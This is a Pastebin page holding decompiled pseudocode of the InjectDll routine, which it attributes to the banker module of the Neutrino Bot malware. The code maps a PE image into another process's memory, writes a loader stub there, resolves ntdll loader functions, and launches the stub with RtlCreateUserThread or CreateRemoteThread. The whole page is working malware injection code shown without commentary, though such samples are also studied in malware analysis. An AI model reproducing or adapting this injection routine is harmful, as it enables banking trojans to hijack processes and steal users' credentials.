SHARE
TWEET

InjectDll from banker module from Neutrino Bot (2018/08/27)

PepperPotts Jan 2nd, 2019 72 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. char __cdecl InjectDll(HANDLE hProcess, LPCVOID lpAddress)
  2. {
  3.   __int64 v3; // rax
  4.   __int64 v4; // rax
  5.   __int64 v5; // kr00_8
  6.   __int64 v6; // rax
  7.   _DWORD *v7; // edx
  8.   __int64 v8; // rax
  9.   __int64 v9; // rax
  10.   __int64 v10; // rax
  11.   __int64 v11; // rax
  12.   __int64 v12; // rax
  13.   HMODULE v13; // eax
  14.   FARPROC v14; // [esp+Ch] [ebp-29Ch]
  15.   FARPROC v15; // [esp+10h] [ebp-298h]
  16.   FARPROC v16; // [esp+14h] [ebp-294h]
  17.   FARPROC v17; // [esp+18h] [ebp-290h]
  18.   __int64 v18; // [esp+1Ch] [ebp-28Ch]
  19.   __int64 v19; // [esp+24h] [ebp-284h]
  20.   __int64 v20; // [esp+2Ch] [ebp-27Ch]
  21.   __int64 v21; // [esp+34h] [ebp-274h]
  22.   LPCVOID v22; // [esp+3Ch] [ebp-26Ch]
  23.   bool v23; // [esp+43h] [ebp-265h]
  24.   struct _MEMORY_BASIC_INFORMATION v24; // [esp+44h] [ebp-264h]
  25.   SIZE_T v25; // [esp+60h] [ebp-248h]
  26.   bool v26; // [esp+67h] [ebp-241h]
  27.   struct _MEMORY_BASIC_INFORMATION v27; // [esp+68h] [ebp-240h]
  28.   SIZE_T v28; // [esp+84h] [ebp-224h]
  29.   bool v29; // [esp+8Bh] [ebp-21Dh]
  30.   struct _MEMORY_BASIC_INFORMATION v30; // [esp+8Ch] [ebp-21Ch]
  31.   SIZE_T v31; // [esp+A8h] [ebp-200h]
  32.   unsigned int v32; // [esp+ACh] [ebp-1FCh]
  33.   char *v33; // [esp+B0h] [ebp-1F8h]
  34.   unsigned int v34; // [esp+B4h] [ebp-1F4h]
  35.   void *v35; // [esp+B8h] [ebp-1F0h]
  36.   char v36; // [esp+BFh] [ebp-1E9h]
  37.   struct _MEMORY_BASIC_INFORMATION Buffer; // [esp+C0h] [ebp-1E8h]
  38.   SIZE_T v38; // [esp+DCh] [ebp-1CCh]
  39.   char v39; // [esp+E0h] [ebp-1C8h]
  40.   HANDLE v40; // [esp+E8h] [ebp-1C0h]
  41.   int v41; // [esp+ECh] [ebp-1BCh]
  42.   FARPROC v42; // [esp+F0h] [ebp-1B8h]
  43.   unsigned __int16 j; // [esp+F4h] [ebp-1B4h]
  44.   struct _OSVERSIONINFOW VersionInformation; // [esp+F8h] [ebp-1B0h]
  45.   LPCVOID lpBuffer; // [esp+218h] [ebp-90h]
  46.   unsigned int i; // [esp+21Ch] [ebp-8Ch]
  47.   __int64 v47; // [esp+220h] [ebp-88h]
  48.   __int64 hObject; // [esp+238h] [ebp-70h]
  49.   LPCVOID v49; // [esp+244h] [ebp-64h]
  50.   __int64 hModule; // [esp+248h] [ebp-60h]
  51.   char *v51; // [esp+250h] [ebp-58h]
  52.   DWORD flOldProtect; // [esp+254h] [ebp-54h]
  53.   int v53; // [esp+258h] [ebp-50h]
  54.   int v54; // [esp+25Ch] [ebp-4Ch]
  55.   char v55; // [esp+267h] [ebp-41h]
  56.   __int64 v56; // [esp+268h] [ebp-40h]
  57.   unsigned __int16 *v57; // [esp+270h] [ebp-38h]
  58.   bool v58; // [esp+277h] [ebp-31h]
  59.   _DWORD *v59; // [esp+278h] [ebp-30h]
  60.   char v60; // [esp+27Fh] [ebp-29h]
  61.   __int64 nSize; // [esp+280h] [ebp-28h]
  62.   LPCVOID v62; // [esp+28Ch] [ebp-1Ch]
  63.   char *v63; // [esp+290h] [ebp-18h]
  64.   char *v64; // [esp+294h] [ebp-14h]
  65.   __int64 lpBaseAddress; // [esp+298h] [ebp-10h]
  66.   __int64 lpParameter; // [esp+2A0h] [ebp-8h]
  67.  
  68.   v60 = 0;
  69.   v55 = 0;
  70.   v58 = 0;
  71.   flOldProtect = 0;
  72.   hModule = 0i64;
  73.   v53 = 0;
  74.   v54 = 0;
  75.   lpBaseAddress = 0i64;
  76.   lpParameter = 0i64;
  77.   v56 = 0i64;
  78.   nSize = 0i64;
  79.   v62 = 0;
  80.   if ( !hProcess )
  81.     return v60;
  82.   v38 = VirtualQuery(lpAddress, &Buffer, 0x1Cu);
  83.   if ( v38 )
  84.     v36 = Buffer.Protect & 1 ? 0 : (Buffer.Protect & 0x100) == 0;
  85.   else
  86.     v36 = 0;
  87.   if ( !v36 )
  88.     return v60;
  89.   v59 = lpAddress;
  90.   if ( *(_WORD *)lpAddress != 23117 )
  91.     return 0;
  92.   v57 = (unsigned __int16 *)((char *)lpAddress + v59[15] + 4);
  93.   if ( *v57 == 34404 )
  94.     v55 = 1;
  95.   if ( v55 )
  96.   {
  97.     sub_10001000();
  98.     v56 = 1088i64;
  99.     nSize = 56i64;
  100.     v34 = 1088;
  101.     v35 = VirtualAlloc(0, 0x441u, 0x3000u, 4u);
  102.     if ( v35 && v35 && &unk_10025530 && v34 )
  103.       qmemcpy(v35, &unk_10025530, v34);
  104.     v62 = v35;
  105.     v51 = (char *)lpAddress + v59[15];
  106.     LODWORD(v3) = sub_10001B70(hProcess, 0, 0, *((_DWORD *)v51 + 20), 12288, 64);
  107.     lpBaseAddress = v3;
  108.     LODWORD(v4) = sub_10001B70(hProcess, 0, 0, nSize + v56, 12288, 64);
  109.     lpParameter = v4;
  110.   }
  111.   else
  112.   {
  113.     v56 = 13839i64;
  114.     nSize = 28i64;
  115.     v32 = 13839;
  116.     v33 = (char *)VirtualAlloc(0, 0x3610u, 0x3000u, 4u);
  117.     if ( v33 && v33 && "éá" && v32 )
  118.       qmemcpy(v33, "éá", v32);
  119.     v62 = v33;
  120.     v64 = (char *)lpAddress + v59[15];
  121.     lpBaseAddress = (signed int)VirtualAllocEx(hProcess, 0, *((_DWORD *)v64 + 20), 0x3000u, 0x40u);
  122.     lpParameter = (signed int)VirtualAllocEx(hProcess, 0, nSize + v56, 0x3000u, 0x40u);
  123.   }
  124.   if ( !lpBaseAddress || !lpParameter )
  125.     return 0;
  126.   v63 = 0;
  127.   if ( v55 )
  128.   {
  129.     v63 = v51 + 264;
  130.     if ( !sub_10001D20(hProcess, lpBaseAddress, HIDWORD(lpBaseAddress), lpAddress, *((_DWORD *)v51 + 21), 0) )
  131.       return 0;
  132.     for ( i = 0; i < *((unsigned __int16 *)v51 + 3); ++i )
  133.     {
  134.       if ( *(_DWORD *)&v63[40 * i + 16] )
  135.       {
  136.         v5 = lpBaseAddress + *(unsigned int *)&v63[40 * i + 12];
  137.         if ( !sub_10001D20(
  138.                 hProcess,
  139.                 v5,
  140.                 HIDWORD(v5),
  141.                 (char *)lpAddress + *(_DWORD *)&v63[40 * i + 20],
  142.                 *(_DWORD *)&v63[40 * i + 16],
  143.                 0) )
  144.           return 0;
  145.       }
  146.     }
  147.     v49 = (LPCVOID)sub_10013750(56);
  148.     v31 = VirtualQuery(v49, &v30, 0x1Cu);
  149.     if ( v31 )
  150.     {
  151.       if ( v30.Protect & 1 )
  152.         v29 = 0;
  153.       else
  154.         v29 = (v30.Protect & 0x100) == 0;
  155.     }
  156.     else
  157.     {
  158.       v29 = 0;
  159.     }
  160.     if ( !v29 )
  161.       return 0;
  162.     LODWORD(v6) = sub_10001390(L"ntdll.dll");
  163.     hModule = v6;
  164.     if ( !v6 )
  165.       return 0;
  166.     v7 = v49;
  167.     *(_DWORD *)v49 = lpBaseAddress;
  168.     v7[1] = HIDWORD(lpBaseAddress);
  169.     *((_QWORD *)v49 + 1) = lpBaseAddress + *((unsigned int *)v51 + 44);
  170.     *((_QWORD *)v49 + 2) = lpBaseAddress + *((unsigned int *)v51 + 36);
  171.     LODWORD(v8) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrLoadDll");
  172.     v21 = v8;
  173.     LODWORD(v8) = v49;
  174.     *((_DWORD *)v49 + 6) = v21;
  175.     *(_DWORD *)(v8 + 28) = HIDWORD(v21);
  176.     if ( !v21 )
  177.       return 0;
  178.     LODWORD(v9) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrGetProcedureAddress");
  179.     v20 = v9;
  180.     LODWORD(v9) = v49;
  181.     *((_DWORD *)v49 + 8) = v20;
  182.     *(_DWORD *)(v9 + 36) = HIDWORD(v20);
  183.     if ( !v20 )
  184.       return 0;
  185.     LODWORD(v10) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlInitAnsiString");
  186.     v19 = v10;
  187.     LODWORD(v10) = v49;
  188.     *((_DWORD *)v49 + 10) = v19;
  189.     *(_DWORD *)(v10 + 44) = HIDWORD(v19);
  190.     if ( !v19 )
  191.       return 0;
  192.     LODWORD(v11) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUnicodeStringFromAsciiz");
  193.     v18 = v11;
  194.     LODWORD(v11) = v49;
  195.     *((_DWORD *)v49 + 12) = v18;
  196.     *(_DWORD *)(v11 + 52) = HIDWORD(v18);
  197.     if ( !v18 )
  198.       return 0;
  199.     if ( !sub_10001D20(hProcess, lpParameter, HIDWORD(lpParameter), v49, nSize, 0) )
  200.       return 0;
  201.     if ( !sub_10001D20(hProcess, nSize + lpParameter, (unsigned __int64)(nSize + lpParameter) >> 32, v62, v56, 0) )
  202.       return 0;
  203.     v58 = sub_10001C50(hProcess, lpParameter, HIDWORD(lpParameter), 28, 32, &flOldProtect) != 0;
  204.     LODWORD(v12) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUserThread");
  205.     v47 = v12;
  206.     if ( !v12 )
  207.       return 0;
  208.     if ( (signed int)sub_10001040(v47, SHIDWORD(v47), 10) >= 0 && hObject )
  209.       CloseHandle((HANDLE)hObject);
  210.   }
  211.   else
  212.   {
  213.     v63 = v64 + 248;
  214.     if ( !WriteProcessMemory(hProcess, (LPVOID)lpBaseAddress, lpAddress, *((_DWORD *)v64 + 21), 0) )
  215.       return 0;
  216.     for ( j = 0; j < (signed int)*((unsigned __int16 *)v64 + 3); ++j )
  217.     {
  218.       if ( *(_DWORD *)&v63[40 * j + 16]
  219.         && !WriteProcessMemory(
  220.               hProcess,
  221.               (LPVOID)(*(_DWORD *)&v63[40 * j + 12] + lpBaseAddress),
  222.               (char *)lpAddress + *(_DWORD *)&v63[40 * j + 20],
  223.               *(_DWORD *)&v63[40 * j + 16],
  224.               0) )
  225.       {
  226.         return 0;
  227.       }
  228.     }
  229.     lpBuffer = (LPCVOID)sub_10013750(28);
  230.     v28 = VirtualQuery(lpBuffer, &v27, 0x1Cu);
  231.     if ( v28 )
  232.     {
  233.       if ( v27.Protect & 1 )
  234.         v26 = 0;
  235.       else
  236.         v26 = (v27.Protect & 0x100) == 0;
  237.     }
  238.     else
  239.     {
  240.       v26 = 0;
  241.     }
  242.     if ( !v26 )
  243.       return 0;
  244.     v13 = GetModuleHandleW(L"ntdll.dll");
  245.     hModule = (signed int)v13;
  246.     if ( !v13 )
  247.       return 0;
  248.     *(_DWORD *)lpBuffer = lpBaseAddress;
  249.     *((_DWORD *)lpBuffer + 1) = lpBaseAddress + *((_DWORD *)v64 + 40);
  250.     *((_DWORD *)lpBuffer + 2) = lpBaseAddress + *((_DWORD *)v64 + 32);
  251.     v17 = GetProcAddress((HMODULE)hModule, "LdrLoadDll");
  252.     *((_DWORD *)lpBuffer + 3) = v17;
  253.     if ( !v17 )
  254.       return 0;
  255.     v16 = GetProcAddress((HMODULE)hModule, "LdrGetProcedureAddress");
  256.     *((_DWORD *)lpBuffer + 4) = v16;
  257.     if ( !v16 )
  258.       return 0;
  259.     v15 = GetProcAddress((HMODULE)hModule, "RtlInitAnsiString");
  260.     *((_DWORD *)lpBuffer + 5) = v15;
  261.     if ( !v15 )
  262.       return 0;
  263.     v14 = GetProcAddress((HMODULE)hModule, "RtlCreateUnicodeStringFromAsciiz");
  264.     *((_DWORD *)lpBuffer + 6) = v14;
  265.     if ( !v14 )
  266.       return 0;
  267.     if ( !WriteProcessMemory(hProcess, (LPVOID)lpParameter, lpBuffer, nSize, 0) )
  268.       return 0;
  269.     if ( !WriteProcessMemory(hProcess, (LPVOID)(nSize + lpParameter), v62, v56, 0) )
  270.       return 0;
  271.     v58 = VirtualProtectEx(hProcess, (LPVOID)lpParameter, 0x1Cu, 0x20u, &flOldProtect) != 0;
  272.     v22 = &VersionInformation;
  273.     v25 = VirtualQuery(&VersionInformation, &v24, 0x1Cu);
  274.     if ( v25 )
  275.     {
  276.       if ( v24.Protect & 1 )
  277.         v23 = 0;
  278.       else
  279.         v23 = (v24.Protect & 0x100) == 0;
  280.     }
  281.     else
  282.     {
  283.       v23 = 0;
  284.     }
  285.     if ( v23 )
  286.       memset((void *)v22, 0, 0x9Cu);
  287.     VersionInformation.dwOSVersionInfoSize = 284;
  288.     GetVersionExW(&VersionInformation);
  289.     if ( VersionInformation.dwMajorVersion > 5 )
  290.     {
  291.       v42 = GetProcAddress((HMODULE)hModule, "RtlCreateUserThread");
  292.       v41 = ((int (__cdecl *)(HANDLE, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, HANDLE *, char *))v42)(
  293.               hProcess,
  294.               0,
  295.               0,
  296.               0,
  297.               0,
  298.               0,
  299.               nSize + lpParameter,
  300.               lpParameter,
  301.               &v40,
  302.               &v39);
  303.       if ( v41 < 0 )
  304.         return 0;
  305.       if ( v40 )
  306.         CloseHandle(v40);
  307.     }
  308.     else if ( !CreateRemoteThread(
  309.                  hProcess,
  310.                  0,
  311.                  0,
  312.                  (LPTHREAD_START_ROUTINE)(nSize + lpParameter),
  313.                  (LPVOID)lpParameter,
  314.                  0,
  315.                  0) )
  316.     {
  317.       return 0;
  318.     }
  319.   }
  320.   return 1;
  321. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top